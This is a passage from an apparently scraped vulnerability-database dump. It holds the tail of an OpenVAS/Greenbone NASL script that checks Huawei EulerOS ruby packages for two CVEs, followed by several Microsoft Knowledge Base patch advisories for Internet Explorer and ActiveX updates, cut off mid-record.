in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1591\");\n script_version(\"2020-05-26T05:46:02+0000\");\n script_cve_id(\"CVE-2020-10663\", \"CVE-2020-10933\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-26 05:46:02 +0000 (Tue, 26 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-26 05:46:02 +0000 (Tue, 26 May 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2020-1591)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP8\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1591\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1591\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ruby' package(s) announced via the EulerOS-SA-2020-1591 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.4 through 2.4.9, 2.5 through 2.5.7, and 2.6 through 2.6.5, has an Unsafe Object Creation Vulnerability. This is quite similar to CVE-2013-0269, but does not rely on poor garbage-collection behavior within Ruby. Specifically, use of JSON parsing methods can lead to creation of a malicious object within the interpreter, with adverse effects that are application-dependent.(CVE-2020-10663)\n\nAn issue was discovered in Ruby 2.5.x through 2.5.7, 2.6.x through 2.6.5, and 2.7.0. If a victim calls BasicSocket#read_nonblock(requested_size, buffer, exception: false), the method resizes the buffer to fit the requested size, but no data is copied. Thus, the buffer string provides the previous value of the heap. This may expose possibly sensitive data from the interpreter.(CVE-2020-10933)\");\n\n script_tag(name:\"affected\", value:\"'ruby' package(s) on Huawei EulerOS V2.0SP8.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP8\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.5.1~98.h8.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~2.5.1~98.h8.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~2.5.1~98.h8.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2020-05-21T10:31:50", "bulletinFamily": "microsoft", "description": "<html><body><p>Resolves vulnerabilities in Internet Explorer that could allow remote code execution if a user views a specially crafted webpage by using Internet Explorer.</p><h2></h2><div class=\"kb-notice-section section\">The update that this article describes has been replaced by a newer update. To resolve this problem, install the most current cumulative security update for Internet Explorer. To install the most current update, visit the following Microsoft website:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/current.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/technet/security/current.aspx</a><a href=\"http://windowsupdate.microsoft.com\" id=\"kb-link-2\" target=\"_self\">http://windowsupdate.microsoft.com</a></div>For more technical information about the most current cumulative security update for Internet Explorer, visit the following Microsoft website:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin\" id=\"kb-link-3\" target=\"_self\">http://technet.microsoft.com/security/bulletin</a></div></div><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS12-010. To view the complete security bulletin, visit one of the following Microsoft websites:<br/><ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201202.aspx\" id=\"kb-link-4\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201202.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-5\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms12-010\" id=\"kb-link-6\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS12-010</a></div></li></ul><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-7\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-8\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-9\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-10\" target=\"_self\">International Support</a><br/><br/></span></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Non-security-related fixes that are included in this security update</h3><h4 class=\"sbody-h4\">General distribution release (GDR) fixes</h4>Individual updates may not be installed, depending on the version of Windows and the version of the affected application. Please view the individual articles to determine your update status.<br/><br/><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Article number</th><th class=\"sbody-th\">Article title</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2658489\" id=\"kb-link-11\">2658489 </a></td><td class=\"sbody-td\">Error message when you use Internet Explorer 9 to browse a webpage that uses the dialogArguments property for the showModalDialog method: \"Permission denied\"</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2711084\" id=\"kb-link-12\">2711084 </a></td><td class=\"sbody-td\">A memory leak occurs in Internet Explorer 8 when you open and then close a new window or tab that contains circular references that involve the window object </td></tr></table></div><h4 class=\"sbody-h4\">Hotfixes</h4>Security update 2647516 packages for Windows XP and for Windows Server 2003 include Internet Explorer hotfix files and general distribution release (GDR) files. If no existing Internet Explorer files are from the hotfix environment, security update 2647516 installs the GDR files. <br/><br/>Hotfixes are intended to correct only the problems that are described in the Microsoft Knowledge Base articles that are associated with the hotfixes. Apply hotfixes only to systems that are experiencing these specific problems. <br/><br/>These hotfixes may receive additional testing. Therefore, if you are not severely affected by this problem, we recommend that you wait for the next service pack that contains these hotfixes. <span>For more information about how to install the hotfixes that are included in security update 2647516, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/897225\" id=\"kb-link-13\">897225 </a> <br/>How to install hotfixes that are included in cumulative security updates for Internet Explorer </div></span><br/><span class=\"text-base\">Note</span>In addition to installing hotfix files, review the Microsoft Knowledge Base article that is associated with the specific hotfix that you have to install to determine the registry modification that is required to enable that specific hotfix. <br/><br/><span>For more information about how to determine whether your existing Internet Explorer files are from the hotfix or from the GDR environment, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/824994\" id=\"kb-link-14\">824994 </a> <br/>Description of the contents of Windows XP Service Pack 2 and Windows Server 2003 software update packages </div></span></div><h2>How to determine whether you are running a 32-bit or a 64-bit edition of Windows</h2><p>If you are not sure which version of Windows that you are running or whether it is a 32-bit version or 64-bit version, open System Information (Msinfo32.exe), and review the value that is listed for <strong class=\"uiterm\">System Type</strong>. To do this, follow these steps:</p><ol class=\"sbody-num_list\"><li>Click <strong class=\"uiterm\">Start</strong>, and then click <strong class=\"uiterm\">Run</strong>, or click <strong class=\"uiterm\">Start Search</strong>.</li><li>Type <strong class=\"uiterm\">msinfo32.exe,</strong> and then press ENTER.</li><li>In <strong class=\"uiterm\">System Information</strong>, review the value for <strong class=\"uiterm\">System Type</strong>.<ul class=\"sbody-free_list\"><li>For 32-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x86-based PC</strong>.</li><li>For 64-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x64-based PC</strong>.</li></ul></li></ol><p><span>For more information about how to determine whether you are running a 32-bit or 64-bit edition of Windows, click the following article number to view the article in the Microsoft Knowledge Base:</span></p><div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/827218\" id=\"kb-link-17\">827218 </a><br/>How to determine whether a computer is running a 32-bit version or a 64-bit version of the Windows operating system</span></div></body></html>", "modified": "2020-05-21T04:51:32", "id": "KB2647516", "href": "https://support.microsoft.com/en-us/help/2647516/", "published": "2020-05-21T04:51:25", "title": "MS12-010: Cumulative Security Update for Internet Explorer: February 14, 2012", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-21T10:31:51", "bulletinFamily": "microsoft", "description": "<html><body><p>Resolves vulnerabilities in Internet Explorer that could allow remote code execution if a user views a specially crafted webpage by using Internet Explorer.</p><h2></h2><div class=\"kb-notice-section section\">The update that this article describes has been replaced by a newer update. To resolve this problem, install the most current cumulative security update for Internet Explorer. To install the most current update, visit the following Microsoft website:<div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/current.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/technet/security/current.aspx</a><a href=\"http://windowsupdate.microsoft.com\" id=\"kb-link-2\" target=\"_self\">http://windowsupdate.microsoft.com</a></div>For more technical information about the most current cumulative security update for Internet Explorer, visit the following Microsoft website:<div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/current.aspx\" id=\"kb-link-3\" target=\"_self\">http://www.microsoft.com/technet/security/current.aspx</a></div></div><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS11-057. To view the complete security bulletin, visit one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201108.aspx\" id=\"kb-link-5\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201108.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now: <div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-6\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/bulletin/ms11-057.mspx\" id=\"kb-link-7\" target=\"_self\">http://www.microsoft.com/technet/security/bulletin/MS11-057.mspx</a></div></li></ul><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-8\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-9\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-10\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-11\" target=\"_self\">International Support</a><br/><br/></span></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Non-security-related fixes that are included in this security update</h3><h4 class=\"sbody-h4\">General distribution release (GDR) fixes</h4>Individual updates may not be installed, depending on your version of Windows and the version of the affected application. Please view the individual articles to determine your update status. <div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Article number</th><th class=\"sbody-th\">Article title</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2591085\" id=\"kb-link-12\">2591085 </a></td><td class=\"sbody-td\">The Internet Explorer 9 option \"Ignore colors specified on webpages\" does not remove background images on webpages</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2589908\" id=\"kb-link-13\">2589908 </a></td><td class=\"sbody-td\">Internet Explorer takes a long time to open a message in Outlook Web App</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2589171\" id=\"kb-link-14\">2589171 </a></td><td class=\"sbody-td\">The Save As dialog box disappears and the file is not saved when you try to download a file in Internet Explorer 9 to a network share on which you have Change permissions</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2529406\" id=\"kb-link-15\">2529406 </a></td><td class=\"sbody-td\">Pictures on a webpage are only partly displayed in Internet Explorer 8 when both IPv4 native sites and IPv4/IPv6 dual-stack sites exist in the network </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2510901\" id=\"kb-link-16\">2510901 </a></td><td class=\"sbody-td\">Internet Explorer 8 may stop responding when you browse some webpages in Windows 7 or in Windows Server 2008 R2</td></tr></table></div><h4 class=\"sbody-h4\">Hotfixes</h4>Security update 2559049 packages for Windows XP and for Windows Server 2003 include Internet Explorer hotfix files and general distribution release (GDR) files. If no existing Internet Explorer files are from the hotfix environment, security update 2559049 installs the GDR files. <br/><br/>Hotfixes are intended to correct only the problems that are described in the Microsoft Knowledge Base articles that are associated with the hotfixes. Apply hotfixes only to systems that are experiencing these specific problems. <br/><br/>These hotfixes may receive additional testing. Therefore, if you are not severely affected by this problem, we recommend that you wait for the next service pack that contains these hotfixes. <span>For more information about how to install the hotfixes that are included in security update 2559049, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/897225\" id=\"kb-link-17\">897225 </a> How to install hotfixes that are included in cumulative security updates for Internet Explorer </div></span><br/><span class=\"text-base\">Note</span>In addition to installing hotfix files, review the Microsoft Knowledge Base article that is associated with the specific hotfix that you have to install to determine the registry modification that is required to enable that specific hotfix. <br/><br/><span>For more information about how to determine whether your existing Internet Explorer files are from the hotfix or from the GDR environment, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/824994\" id=\"kb-link-18\">824994 </a> <br/>Description of the contents of Windows XP Service Pack 2 and Windows Server 2003 software update packages </div></span></div><h2>How to determine whether you are running a 32-bit or a 64-bit edition of Windows</h2><p>If you are not sure which version of Windows you are running or whether your version is a 32-bit or a 64-bit version, you should open System Information (Msinfo32.exe) and then review the value that is listed for <strong class=\"uiterm\">System Type</strong>. To do this, follow these steps:</p><ol class=\"sbody-num_list\"><li>Click <strong class=\"uiterm\">Start</strong>, and then click <strong class=\"uiterm\">Run</strong>, or click <strong class=\"uiterm\">Start Search</strong>.</li><li>Type <strong class=\"uiterm\">msinfo32.exe</strong> and then press Enter.</li><li>In <strong class=\"uiterm\">System Information</strong>, review the value for <strong class=\"uiterm\">System Type</strong>.<ul class=\"sbody-free_list\"><li>For 32-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x86-based PC</strong>.</li><li>For 64-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x64-based PC</strong>.</li></ul></li></ol><p><span>For more information about how to determine whether you are running a 32-bit or 64-bit edition of Windows, click the following article number to view the article in the Microsoft Knowledge Base:</span></p><div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/827218\" id=\"kb-link-21\">827218 </a>How to determine whether a computer is running a 32-bit version or a 64-bit version of the Windows operating system</span></div></body></html>", "modified": "2020-05-21T04:46:04", "id": "KB2559049", "href": "https://support.microsoft.com/en-us/help/2559049/", "published": "2020-05-21T04:45:55", "title": "MS11-057: Cumulative Security Update for Internet Explorer: August 9, 2011", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-21T10:41:09", "bulletinFamily": "microsoft", "description": "<html><body><p>Resolves vulnerabilities in Internet Explorer that could allow remote code execution if a user views a specially crafted webpage by using Internet Explorer.</p><h2>Notice</h2><div class=\"kb-summary-section section\"> <br/>The update that this article describes has been replaced by a newer update. To resolve this problem, install the most current cumulative security update for Internet Explorer. To install the most current update, visit the following Microsoft website:<br/> <div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate\" id=\"kb-link-1\" target=\"_self\">http://update.microsoft.com/microsoftupdate</a><br/></div> <br/> <br/>For more technical information about the most current cumulative security update for Internet Explorer, visit the following Microsoft website:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/current.aspx\" id=\"kb-link-2\" target=\"_self\">http://www.microsoft.com/technet/security/current.aspx</a><br/></div></div><h2>Introduction</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS11-081. To view the complete security bulletin, visit one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201110.aspx\" id=\"kb-link-3\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201110.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or for your laptop from the Microsoft Update Website now: <div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate\" id=\"kb-link-4\" target=\"_self\">http://update.microsoft.com/microsoftupdate</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms11-081\" id=\"kb-link-5\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS11-081</a></div></li></ul><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-6\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-7\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-8\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-9\" target=\"_self\">International Support</a><br/><br/></span></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues with this security update</h3>After you install this security update, some drop-down lists and combo boxes do not appear in Internet Explorer 7.<br/><br/>If a webpage hosts another webpage that is in a different domain, and the hosted webpage has window restrictions enabled (default configuration) and contains a select control such as list or combo box when the hosting page tries to display the combo box or drop-down value from the hosted page, the combo box or list is not displayed.<br/><br/>For more information about\u00a0this problem, click the following article number to view the article in the Microsoft Knowledge Base:<div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2628724\" id=\"kb-link-10\">2628724 </a> Some drop-down lists and combo boxes do not appear in Internet Explorer 7 after you install security update 2586448</div><br/><br/>To resolve this problem, install security update 2618444. For more information, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2618444\" id=\"kb-link-11\">2618444 </a> <br/>MS11-099: Cumulative Security Update for Internet Explorer: December 13, 2011<br/><br/></div><h3 class=\"sbody-h3\">Non-security-related fixes that are included in this security update</h3><h4 class=\"sbody-h4\">General distribution release (GDR) fixes</h4>Individual updates may not be installed, depending on the version of Windows and the version of the affected application. Please view the individual articles to determine your update status.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Article number</th><th class=\"sbody-th\">Article title</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2575790\" id=\"kb-link-12\">2575790 </a></td><td class=\"sbody-td\">Internet Explorer 9 displays a password mask character for Japanese characters that is too large for a password entry box</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2607445\" id=\"kb-link-13\">2607445 </a></td><td class=\"sbody-td\">Download content is lost after you click the gold information bar to confirm a file download in Internet Explorer 8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2601307\" id=\"kb-link-14\">2601307 </a></td><td class=\"sbody-td\">Navigation fails when you click a link that uses a custom pluggable protocol to browse to a secure site in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2601254\" id=\"kb-link-15\">2601254 </a></td><td class=\"sbody-td\">The IHTMLEventObj::put_keyCode property does not work in Internet Explorer 9 Standards mode</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2601253\" id=\"kb-link-16\">2601253 </a></td><td class=\"sbody-td\">You cannot change the font size in Windows Live Mail or in Windows Mail after you install Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2600932\" id=\"kb-link-17\">2600932 </a></td><td class=\"sbody-td\">An application that uses the web browser control in Internet Explorer may crash</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2534550\" id=\"kb-link-18\">2534550 </a></td><td class=\"sbody-td\">The window.createPopup method to create a modal window does not work with protected mode enabled in Internet Explorer 8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2515657\" id=\"kb-link-19\">2515657 </a></td><td class=\"sbody-td\">Windows 7 gadgets may not work or be displayed correctly</td></tr></table></div><h4 class=\"sbody-h4\">Hotfixes</h4>Security update 2586448 packages for Windows XP and for Windows Server 2003 include Internet Explorer hotfix files and general distribution release (GDR) files. If no existing Internet Explorer files are from the hotfix environment, security update 2586448 installs the GDR files. <br/><br/>Hotfixes are intended to correct only the problems that are described in the Microsoft Knowledge Base articles that are associated with the hotfixes. Apply hotfixes only to systems that are experiencing these specific problems. <br/><br/>These hotfixes may receive additional testing. Therefore, if you are not severely affected by this problem, we recommend that you wait for the next service pack that contains these hotfixes. <span>For more information about how to install the hotfixes that are included in security update 2586448, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/897225\" id=\"kb-link-20\">897225 </a> <br/>How to install hotfixes that are included in cumulative security updates for Internet Explorer </div></span><br/><span class=\"text-base\">Note</span> In addition to installing hotfix files, review the Microsoft Knowledge Base article that is associated with the specific hotfix that you have to install to determine the registry modification that is required to enable that specific hotfix. <br/><br/><span>For more information about how to determine whether your existing Internet Explorer files are from the hotfix or from the GDR environment, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/824994\" id=\"kb-link-21\">824994 </a> <br/>Description of the contents of Windows XP Service Pack 2 and Windows Server 2003 software update packages </div></span></div><h2>How to determine whether you are running a 32-bit or a 64-bit edition of Windows</h2><p class=\"sbody-h3\">If you are not sure which version of Windows that you are running or whether it is a 32-bit version or 64-bit version, open System Information (Msinfo32.exe), and review the value that is listed for <strong class=\"uiterm\">System Type</strong>. To do this, follow these steps:</p><ol class=\"sbody-num_list\"><li><p>Click <strong class=\"uiterm\">Start</strong>, and then click <strong class=\"uiterm\">Run</strong>, or click <strong class=\"uiterm\">Start Search</strong>.</p></li><li>Type <strong class=\"uiterm\">msinfo32.exe</strong>, and then press Enter.</li><li>In <strong class=\"uiterm\">System Information</strong>, review the value for <strong class=\"uiterm\">System Type</strong>.<ul class=\"sbody-free_list\"><li>For 32-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x86-based PC</strong>.</li><li>For 64-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x64-based PC</strong>.</li></ul></li></ol><p><span>For more information about how to determine whether you are running a 32-bit or 64-bit edition of Windows, click the following article number to view the article in the Microsoft Knowledge Base:</span></p><div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/827218\" id=\"kb-link-24\">827218 </a><br/>How to determine whether a computer is running a 32-bit version or a 64-bit version of the Windows operating system</span></div></body></html>", "modified": "2020-05-21T04:43:03", "id": "KB2586448", "href": "https://support.microsoft.com/en-us/help/2586448/", "published": "2020-05-21T04:42:54", "title": "MS11-081: Cumulative Security Update for Internet Explorer: October 11, 2011", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-21T10:29:51", "bulletinFamily": "microsoft", "description": "<html><body><p>Addresses vulnerabilities for Microsoft software that could allow remote code execution if a user views a specially crafted webpage that instantiates a specific ActiveX control in Internet Explorer.</p><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS10-034. To view the complete security bulletin, visit one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users:<br/><br/><div class=\"indent\"><a href=\"http://www.microsoft.com/protect/computer/updates/bulletins/201006.mspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/protect/computer/updates/bulletins/201006.mspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now: <div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate</a></div></li><li>IT professionals:<br/><br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/bulletin/ms10-034.mspx\" id=\"kb-link-3\" target=\"_self\">http://www.microsoft.com/technet/security/bulletin/MS10-034.mspx</a></div></li></ul><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></span></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Security update download packages</h3><span>The following files are available for download from the Microsoft Download Center:</span><h4 class=\"sbody-h4\">For Windows 7 for 32-bit systems</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/2/1/6/21616494-76c7-4d05-a573-bd4aa90e8460/windows6.1-kb980195-x86.msu\" id=\"kb-link-8\" target=\"_self\">Download the Windows6.1-KB980195-x86.msu package now.</a></span><h4 class=\"sbody-h4\">For Windows 7 for x64-based systems</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/1/a/0/1a0d4772-1ea8-436c-a103-55d4bdba744b/windows6.1-kb980195-x64.msu\" id=\"kb-link-9\" target=\"_self\">Download the Windows6.1-KB980195-x64.msu package now.</a></span><h4 class=\"sbody-h4\">For Windows Server 2008 R2 for Itanium-based systems</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/7/5/5/755a2ed9-f06e-41b7-abb7-e5c75e536aab/windows6.1-kb980195-ia64.msu\" id=\"kb-link-10\" target=\"_self\">Download the Windows6.1-KB980195-ia64.msu package now.</a></span><h4 class=\"sbody-h4\">For Windows Server 2008 R2 for x64-based systems</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a 